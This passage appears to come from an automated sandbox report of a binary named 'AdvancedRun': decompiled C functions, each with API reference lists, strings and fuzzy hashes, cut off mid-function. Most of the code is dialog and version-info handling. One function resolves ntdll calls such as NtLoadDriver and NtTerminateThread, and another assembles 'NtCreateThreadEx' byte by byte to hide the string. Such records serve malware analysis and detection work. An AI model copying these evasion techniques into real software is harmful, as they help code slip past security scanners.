					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}

APIs

GetDlgItem.USER32 ref: 004010EB
ChildWindowFromPoint.USER32 ref: 004010FD
GetDlgItem.USER32 ref: 00401133
ChildWindowFromPoint.USER32 ref: 00401140
GetDlgItem.USER32 ref: 0040116E
ChildWindowFromPoint.USER32 ref: 00401180
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401189
LoadCursorW.USER32(00000000,00000067), ref: 00401192
SetCursor.USER32(00000000,?,?), ref: 00401199
GetDlgItem.USER32 ref: 004011BA
ChildWindowFromPoint.USER32 ref: 004011C7
GetDlgItem.USER32 ref: 004011E1
SetBkMode.GDI32(?,00000001), ref: 004011ED
SetTextColor.GDI32(?,00C00000), ref: 004011FB
GetSysColorBrush.USER32(0000000F), ref: 00401203
GetDlgItem.USER32 ref: 00401224
EndDialog.USER32(?,?), ref: 00401259
DeleteObject.GDI32(?), ref: 00401265
GetDlgItem.USER32 ref: 0040128A
ShowWindow.USER32(00000000), ref: 00401293
GetDlgItem.USER32 ref: 0040129F
ShowWindow.USER32(00000000), ref: 004012A2
SetDlgItemTextW.USER32 ref: 004012B3
SetWindowTextW.USER32(?,AdvancedRun), ref: 004012C1
SetDlgItemTextW.USER32 ref: 004012D9
SetDlgItemTextW.USER32 ref: 004012EA

Strings

AdvancedRun, xrefs: 004012B9

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID: AdvancedRun
API String ID: 829165378-481304740
Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18

Uniqueness

Uniqueness Score: -1.00%

Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

Strings

NtUnloadDriver, xrefs: 00408E6F
NtQueryObject, xrefs: 00408EA5
NtQuerySymbolicLinkObject, xrefs: 00408E93
NtOpenThread, xrefs: 00408EB7
NtClose, xrefs: 00408EC9
NtTerminateThread, xrefs: 00408F11
NtQueryInformationThread, xrefs: 00408EDB
NtOpenSymbolicLinkObject, xrefs: 00408E81
NtQuerySystemInformation, xrefs: 00408E50
NtLoadDriver, xrefs: 00408E5D
NtSuspendThread, xrefs: 00408EED
ntdll.dll, xrefs: 00408E3F
NtResumeThread, xrefs: 00408EFF

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
API String ID: 667068680-4280973841
Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C

Uniqueness

Uniqueness Score: -1.00%

Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216
windowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8;
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc;
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}

APIs

EndDialog.USER32(?,?), ref: 00408B20
GetDlgItem.USER32 ref: 00408B38
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00408B56
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00408B62
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00408B6A
memset.MSVCRT ref: 00408B91
memset.MSVCRT ref: 00408BB3
memset.MSVCRT ref: 00408BCC
memset.MSVCRT ref: 00408BE0
memset.MSVCRT ref: 00408BFA
memset.MSVCRT ref: 00408C12
GetCurrentProcess.KERNEL32 ref: 00408C1A
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00408C3D
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00408C6F
memset.MSVCRT ref: 00408CC2
GetCurrentProcessId.KERNEL32 ref: 00408CD0
memcpy.MSVCRT ref: 00408CFE
wcscpy.MSVCRT ref: 00408D21
_snwprintf.MSVCRT ref: 00408D90
SetDlgItemTextW.USER32 ref: 00408DA8
GetDlgItem.USER32 ref: 00408DB2
SetFocus.USER32(00000000), ref: 00408DB9

Strings

{Unknown}, xrefs: 00408BA5
Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

APIs

GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
??2@YAPAXI@Z.MSVCRT ref: 0040B07E
GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
_snwprintf.MSVCRT ref: 0040B0FE
wcscpy.MSVCRT ref: 0040B128
??3@YAXPAX@Z.MSVCRT ref: 0040B1D8

Strings

FileVersion, xrefs: 0040B156
CompanyName, xrefs: 0040B180
040904E4, xrefs: 0040B122
OriginalFileName, xrefs: 0040B1BF
LegalCopyright, xrefs: 0040B1AA
\VarFileInfo\Translation, xrefs: 0040B0D8
InternalName, xrefs: 0040B195
ProductVersion, xrefs: 0040B16B
%4.4X%4.4X, xrefs: 0040B0F3
ProductName, xrefs: 0040B12F
FileDescription, xrefs: 0040B141

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 1223191525-1542517562
Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

e, xrefs: 0040A24F
N, xrefs: 0040A21F
x, xrefs: 0040A24B
h, xrefs: 0040A25B
t, xrefs: 0040A22F
e, xrefs: 0040A233
d, xrefs: 0040A23F
E, xrefs: 0040A247
a, xrefs: 0040A253
a, xrefs: 0040A22B
r, xrefs: 0040A243
C, xrefs: 0040A237
T, xrefs: 0040A257
t, xrefs: 0040A223
ntdll.dll, xrefs: 0040A1FA
r, xrefs: 0040A23B
e, xrefs: 0040A227

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
API String ID: 2574300362-1257427173
Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776

Uniqueness

Uniqueness Score: -1.00%

Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}

APIs

memset.MSVCRT ref: 00407FD0
memset.MSVCRT ref: 00407FE5
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
LoadImageW.USER32 ref: 004080B4
GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
LoadImageW.USER32 ref: 004080D1
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
GetSysColor.USER32(0000000F), ref: 004080EA
ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
DeleteObject.GDI32(?), ref: 00408121
DeleteObject.GDI32(?), ref: 00408127
SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 304928396-0
Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
